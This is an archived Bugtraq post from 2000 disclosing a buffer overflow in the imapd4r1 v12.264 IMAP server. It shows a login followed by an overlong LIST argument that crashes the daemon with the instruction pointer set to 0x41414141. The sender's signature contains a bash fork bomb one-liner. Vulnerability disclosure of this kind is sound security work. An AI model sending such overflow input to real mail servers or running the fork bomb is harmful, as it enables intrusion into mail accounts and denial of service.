Bugtraq mailing list archives
imapd4r1 v12.264
From: lcamtuf () DIONE IDS PL (Michal Zalewski)
Date: Sun, 16 Apr 2000 14:19:43 +0200
Newest RH: * OK nimue IMAP4rev1 v12.264 server ready 1 login lcamtuf test 1 OK LOGIN completed 1 list "" AAAAAAAAAAAAAAAAAAAAAAAAAAA...[yes, a lot of 'A's ;] Program received signal SIGSEGV, Segmentation fault. 0x41414141 in ?? () *sigh* Privledges seems to be dropped, but, anyway, it's nice way to get shell access to mail account, maybe grab some data from memory etc. I believe both imap and ipopd packages need code security audit. _______________________________________________________ Michal Zalewski [lcamtuf () tpi pl] [tp.internet/security] [http://lcamtuf.na.export.pl] <=--=> bash$ :(){ :|:&};: =-----=> God is real, unless declared integer. <=-----= =========================================================================== List przyszed³ z listy <secure () mud pl>
Current thread:
- imapd4r1 v12.264 Michal Zalewski (Apr 16)
- Re: imapd4r1 v12.264 Tibor Pittich (Apr 17)
- Re: imapd4r1 v12.264 Sven Carstens (Apr 17)